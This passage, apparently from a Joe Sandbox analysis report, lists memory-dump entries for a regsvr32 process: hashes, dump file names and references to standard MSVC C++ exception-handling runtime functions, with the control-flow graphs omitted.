                  • Instruction ID: d0e3aa63879acfc99c25af0c0feb1ec41bb5935efd424e6cedd1358327629424
                  • Opcode Fuzzy Hash: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
                  • Instruction Fuzzy Hash: 97C13A9BBB8A080B6B0C98BA5C973F726C3D3E5709B1DF13D4997D7145ECAD884B1144
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                  • Instruction ID: c07f4953206a69ffcf429613873a8573afbce264ef1f6de272fcee3660162c32
                  • Opcode Fuzzy Hash: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                  • Instruction Fuzzy Hash: 2EB10830638B498FDB2DDBB9988427D77D2FB84710F54475EF886C3199DF6098828A82
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID: _invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 3215553584-0
                  • Opcode ID: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                  • Instruction ID: 71435476067e34cf9054a21acc42410fc0db319e19c0a64c0d27bb1ec9854553
                  • Opcode Fuzzy Hash: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                  • Instruction Fuzzy Hash: E091083063CF0D8FD72CEFB99849276B7D2FB84710B50471EE89AC3255DE6098428682
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                  • Instruction ID: 325174c8a6eb805a5473ce2de8be57a6bb12878e64901de9e9125f83cfab3f19
                  • Opcode Fuzzy Hash: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                  • Instruction Fuzzy Hash: 6A51C132328E094F9B1CDEACD49867573E3F7AC314315822EE40ED72A9DA74E9468785

                  Control-flow Graph

                  Control-flow graph for 2246c48 (node/edge list omitted; executed/not-executed colouring not reproduced): vcruntime C++ exception handler-search code (the "csm" magic and the __FrameHandler3 helpers are listed below). The entry block 2246c48-2246caf calls 2246070; the remaining blocks call only internal helpers (223e560, 223e49c, 223e300, 22471ec, 2241334, 2242430, 2241468, 22414a8, 22410d0, 2241494, 2246490, 2241160, 2241230, 2246610, 2247118, 2246580, 223cd68, 224639c, 22488f8), and no Win32 import is called directly from this function.
                  APIs
                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02246CA4
                    • Part of subcall function 02246070: __GetUnwindTryBlock.LIBCMT ref: 022460B3
                    • Part of subcall function 02246070: __SetUnwindTryBlock.LIBVCRUNTIME ref: 022460D8
                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02246D7C
                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02246FCB
                  • std::bad_alloc::bad_alloc.LIBCMT ref: 022470D7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Similarity
                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                  • String ID: csm$csm$csm
                  • API String ID: 849930591-393685449
                  • Opcode ID: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                  • Instruction ID: f6e58f06177f1c5b57df6ad195542c3e25207210649056ffa1eab013b0046b9a
                  • Opcode Fuzzy Hash: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                  • Instruction Fuzzy Hash: D8E19270928B098FDB28EFA8C4857A9B7E1FF59314F50165EE489D7219DF30E485CB82

                  Control-flow Graph

                  Control-flow graph of the function at 02246608 (rendered graph; node layout omitted)
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 02246A38
                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 02246B20
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Similarity
                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                  • String ID: csm$csm
                  • API String ID: 3896166516-3733052814
                  • Opcode ID: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                  • Instruction ID: c57d1e648e86c1fb15fbef30cbbe31dfc3f6bbd31c4f082c0379535bf199dc34
                  • Opcode Fuzzy Hash: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                  • Instruction Fuzzy Hash: A9615C30628B0A8FCB6CDFA8C088374B7E5FB59319F64865AD489C7659DF74D881CB42

                  Control-flow Graph

                  Control-flow graph of the function at 02246750 (rendered graph; node layout omitted)
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Similarity
                  • API ID: AdjustPointer
                  • String ID:
                  • API String ID: 1740715915-0
                  • Opcode ID: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                  • Instruction ID: 410f7a83b82ea0c6deae667fbfdde7dd06512d1972f0ee7f6e9b10847cc89d40
                  • Opcode Fuzzy Hash: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                  • Instruction Fuzzy Hash: FB81A130538F1B8B9B3DAFA88050275B3E5FB9A714B98066ED44AC315DDFB0D885CB81

                  Control-flow Graph

                  Control-flow graph of the function at 0223CB50 (rendered graph; node layout omitted)
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 0223CB7B
                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0223CC12
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Similarity
                  • API ID: CurrentImageNonwritable__except_validate_context_record
                  • String ID: csm
                  • API String ID: 3242871069-1018135373
                  • Opcode ID: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                  • Instruction ID: 75387e7a1c1c3d734609b8cb522a22be0224ff6491c4b8446bc6a961eba3f0ce
                  • Opcode Fuzzy Hash: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                  • Instruction Fuzzy Hash: F961D470228B098BCF29EF9CD485A7477D1FB58354B10496FE886D726AEB30E851CB85

                  Control-flow Graph

                  Control-flow graph of the function at 022471EC (rendered graph; node layout omitted)
                  APIs
                  • _CallSETranslator.LIBVCRUNTIME ref: 02247297
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Similarity
                  • API ID: CallTranslator
                  • String ID: MOC$RCC
                  • API String ID: 3163161869-2084237596
                  • Opcode ID: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                  • Instruction ID: c9cb6fb7569fdb71e0a805c881d9155433fbb1ae3b83056114398c0b75fda638
                  • Opcode Fuzzy Hash: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                  • Instruction Fuzzy Hash: 9E71AF30528B488FD729EF58C446BA9BBE0FB99314F444A5EE899C3215DB74E481CB82